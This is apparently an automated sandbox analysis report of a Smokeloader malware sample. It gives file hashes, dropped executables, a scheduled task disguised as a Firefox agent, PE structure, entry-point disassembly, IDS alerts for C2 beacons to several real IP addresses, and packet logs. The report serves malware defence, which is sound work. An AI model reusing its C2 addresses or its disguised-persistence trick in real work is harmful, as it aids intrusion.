                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time | Type | Description
                23:28:58 | Task Scheduler | Run new task: Firefox Default Browser Agent 89EA80F91608AAD9 path: C:\Users\user\AppData\Roaming\cgjtubb
                23:29:12 | API Interceptor | 62x Sleep call for process: rundll32.exe modified
                23:29:37 | API Interceptor | 1x Sleep call for process: 2B26.exe modified
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:modified
                                                        Size (bytes):619008
                                                        Entropy (8bit):7.595894396722197
                                                        Encrypted:false
                                                        SSDEEP:6144:CG3Dn9cuFOPjNJwJVxlyAiTAKNpPcYgipW9sDKg62X4P+LCcCChsMDmshnkf8+C7:hzn9uPZJmFilwfsxoIbCz6zc8wG
                                                        MD5:B30C788530FD281E8C434DA4B8214DB4
                                                        SHA1:2F83E8E55850238B9195883799F976839DF025C0
                                                        SHA-256:7525CA4CFFEEC337A342E636EEF15F5D9FDAC910AEC7467F1B855416C6F2CF7A
                                                        SHA-512:74C01977EA1687125DC4F1B92FA557359705A8EE6ACFF58F6F021AA7EA03759AD542A57AFF1FC2BF9BF8D9CE65326B32A44013F6A9C3B00936FF760F1F89BC6A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Reputation:low
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1134592
                                                        Entropy (8bit):7.828823860751131
                                                        Encrypted:false
                                                        SSDEEP:24576:YKAqUNGPdqsbEwe0qATvITiju9AIM2c2m6zc:YBqU4qsbje0qCI+Ck6zc
                                                        MD5:823B2BD8B63CAFBEA781C59993109B99
                                                        SHA1:E385DFCBBD2B24A8B9184493F629F24FE95A4741
                                                        SHA-256:7B23F464DC640B6BA79B4213B2ACE1D96E68F039C21BAB5E1A21E3A4F707DC6D
                                                        SHA-512:B1193F2CE6B964AF886F5F4216696028295EAAC09165E60C09039715D87FE033B4E3BB05CA38E0D02637C5B7588D6618487669BA96B574FB73CFDF8AA3437241
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Reputation:low
                                                        Process:C:\Users\user\AppData\Local\Temp\FD31.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):770048
                                                        Entropy (8bit):6.839518525412359
                                                        Encrypted:false
                                                        SSDEEP:12288:zfSxtWGq0esNiHPcc92qLSl6Tw3he78O48BG7QvUaDkndA+OmV8YqOgFkVd4FGJC:z6x4ff3Sxg5/R5ou7/P795pJc
                                                        MD5:AD4FE6DD11ECA5F7254E0E00ED47D984
                                                        SHA1:E809DE0322D74DD4642F215F46F22B3A9B7CAA21
                                                        SHA-256:6ECC725EAB418E27D8FA2F1031FCE6BC119D677B8D72E0447050A87489E8E0CA
                                                        SHA-512:D09F4F9A94F34FE1A6F5FE78EC32E91026FE07263183D4D41C4A51CFA7EE5FBC1B38D2EBEDA20A717A2A730AF011D73D113DECB3AE2FE9DB50530C095CF33EA3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Joe Sandbox View:
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.Win32.PWSX-gen.15846.15487.exe, Detection: malicious, Browse
                                                        • Filename: tZU0MUwxja.exe, Detection: malicious, Browse
                                                        • Filename: 8uRBOolRiA.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e:..![.@![.@![.@.,.A&[.@.,.A [.@L..A"[.@![.@5[.@.D.@([.@...A [.@...A [.@...A [.@Rich![.@................PE..L...R.xc...........!.....2...................P............................................@..........................Q..@....Q..<...............................`S...P...............................................P..@............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...`1...`...2...:..............@....reloc..`S.......T...l..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):310272
                                                        Entropy (8bit):6.931502130500228
                                                        Encrypted:false
                                                        SSDEEP:3072:SYSXEsZbccjajbfH/ERv9m/Y1ymkYFFdurkrdJVqje7DmZ6K8nkf2x+CqbbSyyr:JSXBFEf/o9rsmzamsMDmshnkf8+CwbG
                                                        MD5:8691765A5EF6354D21BD12C83E9DF20B
                                                        SHA1:47B548237CED425F7F2AC209CCF0914F8980FA70
                                                        SHA-256:C9B23216DC8719C25C60FE8334FA5A5C3B9AD54FCAEDF94DFB18B8E8EC6CDA2B
                                                        SHA-512:D7EB0DADC5F2E856DFDCEA43936BF3355A858880EC9E814C6528DAA82F27E3C377F00AF6968176E064F7C10C9ECD75E6DDEFFFC4F3EA718A5AE0ABF0167AD65E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#G..g&tRg&tRg&tRyt.Rs&tRyt.R.&tRyt.RK&tR@..R`&tRg&uR.&tRyt.Rf&tRyt.Rf&tRyt.Rf&tRRichg&tR................PE..L.....=b.............................Q............@.......................... ......3.......................................L...P.......h............................................................/..@............................................text...2........................... ..`.data...............................@....rsrc...h...........................@..@.reloc..:...........................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.931502130500228
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.55%
                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:file.exe
                                                        File size:310272
                                                        MD5:8691765a5ef6354d21bd12c83e9df20b
                                                        SHA1:47b548237ced425f7f2ac209ccf0914f8980fa70
                                                        SHA256:c9b23216dc8719c25c60fe8334fa5a5c3b9ad54fcaedf94dfb18b8e8ec6cda2b
                                                        SHA512:d7eb0dadc5f2e856dfdcea43936bf3355a858880ec9e814c6528daa82f27e3c377f00af6968176e064f7c10c9ecd75e6ddefffc4f3ea718a5ae0abf0167ad65e
                                                        SSDEEP:3072:SYSXEsZbccjajbfH/ERv9m/Y1ymkYFFdurkrdJVqje7DmZ6K8nkf2x+CqbbSyyr:JSXBFEf/o9rsmzamsMDmshnkf8+CwbG
                                                        TLSH:1664AE0176BCCF62D5DD4D7CCC2EFB94DBB8B85299384557766B3AAE1E30391422220E
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#G..g&tRg&tRg&tRyt.Rs&tRyt.R.&tRyt.RK&tR@..R`&tRg&uR.&tRyt.Rf&tRyt.Rf&tRyt.Rf&tRRichg&tR................PE..L.....=b...........
                                                        Icon Hash:8c9cbcccce8888e5
                                                        Entrypoint:0x4051d8
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x623DBFFC [Fri Mar 25 13:13:32 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:0
                                                        File Version Major:5
                                                        File Version Minor:0
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:0
                                                        Import Hash:45d8216f77748b6d8826de34ecd9c69e
                                                        Instruction
                                                        call 00007FEF88A8627Fh
                                                        jmp 00007FEF88A8266Dh
                                                        push 00000008h
                                                        push 0040FEB8h
                                                        call 00007FEF88A834D3h
                                                        mov ecx, dword ptr [ebp+08h]
                                                        test ecx, ecx
                                                        je 00007FEF88A8281Ch
                                                        cmp dword ptr [ecx], E06D7363h
                                                        jne 00007FEF88A82814h
                                                        mov eax, dword ptr [ecx+1Ch]
                                                        test eax, eax
                                                        je 00007FEF88A8280Dh
                                                        mov eax, dword ptr [eax+04h]
                                                        test eax, eax
                                                        je 00007FEF88A82806h
                                                        and dword ptr [ebp-04h], 00000000h
                                                        push eax
                                                        push dword ptr [ecx+18h]
                                                        call 00007FEF88A863B9h
                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                        call 00007FEF88A834E2h
                                                        ret
                                                        xor eax, eax
                                                        cmp byte ptr [ebp+0Ch], al
                                                        setne al
                                                        ret
                                                        mov esp, dword ptr [ebp-18h]
                                                        call 00007FEF88A8585Ch
                                                        int3
                                                        call 00007FEF88A8302Ah
                                                        xor ecx, ecx
                                                        cmp dword ptr [eax+00000090h], ecx
                                                        setne cl
                                                        mov al, cl
                                                        ret
                                                        mov edi, edi
                                                        push ebp
                                                        mov ebp, esp
                                                        mov eax, dword ptr [ebp+08h]
                                                        mov dword ptr [0042A044h], eax
                                                        pop ebp
                                                        ret
                                                        mov edi, edi
                                                        push ebp
                                                        mov ebp, esp
                                                        sub esp, 00000328h
                                                        mov eax, dword ptr [00411410h]
                                                        xor eax, ebp
                                                        mov dword ptr [ebp-04h], eax
                                                        and dword ptr [ebp-00000328h], 00000000h
                                                        push ebx
                                                        push 0000004Ch
                                                        lea eax, dword ptr [ebp-00000324h]
                                                        push 00000000h
                                                        push eax
                                                        call 00007FEF88A866DFh
                                                        lea eax, dword ptr [ebp-00000328h]
                                                        mov dword ptr [ebp-000002D8h], eax
                                                        lea eax, dword ptr [ebp-000002D0h]
                                                        add esp, 0Ch
                                                        mov dword ptr [ebp+00FFFD2Ch], eax
                                                        Programming Language:
                                                        • [ASM] VS2008 build 21022
                                                        • [ C ] VS2008 build 21022
                                                        • [C++] VS2008 build 21022
                                                        • [IMP] VS2005 build 50727
                                                        • [RES] VS2008 build 21022
                                                        • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1024c | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e000 | 0x21068 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x50000 | 0xaac | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11d0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2f08 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x180 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xfb32 | 0xfc00 | False | 0.5807136656746031 | data | 6.722585865916189 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x1c6bc | 0x19000 | False | 0.838154296875 | data | 7.3097228756772745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e000 | 0x21068 | 0x21200 | False | 0.6358637971698113 | data | 6.357000757091439 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x50000 | 0x193a | 0x1a00 | False | 0.3557692307692308 | data | 3.553364651483905 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AFX_DIALOG_LAYOUT | 0x4d078 | 0xe | data | Setsuana | South Africa
BANUMAROSAJOYUTE | 0x4a100 | 0x7d1 | ASCII text, with very long lines (2001), with no line terminators | Setsuana | South Africa
PESIVINAFUSAWAVIJEWAZUYIJOVOBOR | 0x4af08 | 0x2107 | ASCII text, with very long lines (8455), with no line terminators | Setsuana | South Africa
SIROPIMOTUGAGI | 0x4a8d8 | 0x629 | ASCII text, with very long lines (1577), with no line terminators | Setsuana | South Africa
RT_CURSOR | 0x4d088 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Setsuana | South Africa
RT_CURSOR | 0x4df30 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Setsuana | South Africa
RT_CURSOR | 0x4e800 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | Setsuana | South Africa
RT_CURSOR | 0x4e930 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 0 | Setsuana | South Africa
RT_ICON | 0x2ebd0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Setsuana | South Africa
RT_ICON | 0x2fa78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Setsuana | South Africa
RT_ICON | 0x30320 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x328c8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x33970 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x33e28 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Setsuana | South Africa
RT_ICON | 0x344f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x36a98 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x36f30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Setsuana | South Africa
RT_ICON | 0x37dd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Setsuana | South Africa
RT_ICON | 0x38680 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Setsuana | South Africa
RT_ICON | 0x38be8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x3b190 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x3c238 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x3cbc0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x3d090 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Setsuana | South Africa
RT_ICON | 0x3df38 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Setsuana | South Africa
RT_ICON | 0x3e7e0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Setsuana | South Africa
RT_ICON | 0x3eea8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Setsuana | South Africa
RT_ICON | 0x3f410 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Setsuana | South Africa
RT_ICON | 0x419b8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Setsuana | South Africa
RT_ICON | 0x42a60 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Setsuana | South Africa
RT_ICON | 0x433e8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Setsuana | South Africa
RT_ICON | 0x438c8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Setsuana | South Africa
RT_ICON | 0x44770 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Setsuana | South Africa
RT_ICON | 0x45018 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Setsuana | South Africa
RT_ICON | 0x456e0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Setsuana | South Africa
RT_ICON | 0x45c48 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x481f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x49298 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Setsuana | South Africa
RT_ICON | 0x49c20 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Setsuana | South Africa
RT_STRING | 0x4ebf8 | 0x470 | data | Setsuana | South Africa
RT_ACCELERATOR | 0x4d010 | 0x28 | data | Setsuana | South Africa
RT_GROUP_CURSOR | 0x4e7d8 | 0x22 | data | Setsuana | South Africa
RT_GROUP_CURSOR | 0x4e9e0 | 0x22 | data | Setsuana | South Africa
RT_GROUP_ICON | 0x33dd8 | 0x4c | data | Setsuana | South Africa
RT_GROUP_ICON | 0x36f00 | 0x30 | data | Setsuana | South Africa
RT_GROUP_ICON | 0x3d028 | 0x68 | data | Setsuana | South Africa
RT_GROUP_ICON | 0x43850 | 0x76 | data | Setsuana | South Africa
RT_GROUP_ICON | 0x4a088 | 0x76 | data | Setsuana | South Africa
RT_VERSION | 0x4ea08 | 0x1ec | data | Setsuana | South Africa
None | 0x4d048 | 0xa | data | Setsuana | South Africa
None | 0x4d038 | 0xa | data | Setsuana | South Africa
None | 0x4d058 | 0xa | data | Setsuana | South Africa
None | 0x4d068 | 0xa | data | Setsuana | South Africa
DLL | Import
KERNEL32.dll | CreateMutexW, WriteConsoleOutputCharacterA, OpenJobObjectA, GetCommState, AddConsoleAliasW, GetSystemDefaultLCID, GetFileAttributesExA, GetModuleHandleW, WaitNamedPipeW, LoadLibraryW, CopyFileW, GetFileAttributesW, WriteConsoleW, GetVolumePathNameA, GetConsoleAliasesW, FillConsoleOutputCharacterW, GetComputerNameA, SetLastError, GetProcAddress, VirtualAlloc, RemoveDirectoryA, EnumSystemCodePagesW, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, CreateHardLinkW, GetModuleHandleA, FindNextFileW, GetStringTypeW, SetFileShortNameA, LCMapStringW, GetLastError, GetVolumeNameForVolumeMountPointA, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapSize, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, HeapReAlloc, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetLocaleInfoA, FlushFileBuffers, GetConsoleOutputCP, CloseHandle, CreateFileA
GDI32.dll | GetCharacterPlacementW
ole32.dll | CoRevokeMallocSpy
Language of compilation system | Country where language is spoken
Setsuana | South Africa
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/20/22-23:29:42.980601 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49732 | 80 | 192.168.2.4 | 222.236.49.123
11/20/22-23:29:11.593775 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49706 | 80 | 192.168.2.4 | 190.140.74.43
11/20/22-23:29:38.939202 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49729 | 80 | 192.168.2.4 | 190.147.188.50
11/20/22-23:29:17.825718 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49712 | 80 | 192.168.2.4 | 190.140.74.43
11/20/22-23:29:15.417911 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49710 | 80 | 192.168.2.4 | 190.140.74.43
11/20/22-23:28:59.421588 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49699 | 80 | 192.168.2.4 | 175.119.10.231
11/20/22-23:29:20.999357 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49715 | 80 | 192.168.2.4 | 138.36.3.134
11/20/22-23:29:44.502536 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49733 | 80 | 192.168.2.4 | 175.119.10.231
11/20/22-23:29:27.376996 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49721 | 80 | 192.168.2.4 | 222.236.49.123
11/20/22-23:29:34.630714 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49726 | 80 | 192.168.2.4 | 175.119.10.231
11/20/22-23:29:40.008032 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49730 | 80 | 192.168.2.4 | 210.182.29.70
11/20/22-23:29:36.126865 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49727 | 80 | 192.168.2.4 | 210.182.29.70
11/20/22-23:29:19.586363 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49714 | 80 | 192.168.2.4 | 222.236.49.123
11/20/22-23:29:29.402513 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49723 | 80 | 192.168.2.4 | 175.119.10.231
11/20/22-23:29:10.022918 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49705 | 80 | 192.168.2.4 | 210.182.29.70
11/20/22-23:29:08.366632 | TCP | 2851815 | ETPRO TROJAN Sharik/Smokeloader CnC Beacon 1 | 49704 | 80 | 192.168.2.4 | 138.36.3.134
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Nov 20, 2022 23:29:05.358576059 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358587027 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.358609915 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358630896 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.358652115 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358691931 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358700037 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.358721018 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358747005 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358764887 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.358772993 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358799934 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358819962 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.358825922 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358851910 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358874083 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.358907938 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358944893 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.358959913 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.358979940 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359014988 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359028101 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.359050989 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359083891 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359097958 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.359118938 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359143972 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359169006 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359194994 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359208107 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.359208107 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.359220028 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359246016 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359270096 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.359271049 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359298944 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359318972 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.359325886 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359350920 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359375954 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.359383106 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.359422922 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.632817030 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.632903099 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.632949114 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.632992029 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.632993937 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.633038044 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.633075953 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.633100033 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.633173943 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.633186102 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:05.633241892 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.633301973 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:05.633315086 CET4970380192.168.2.4123.253.32.170
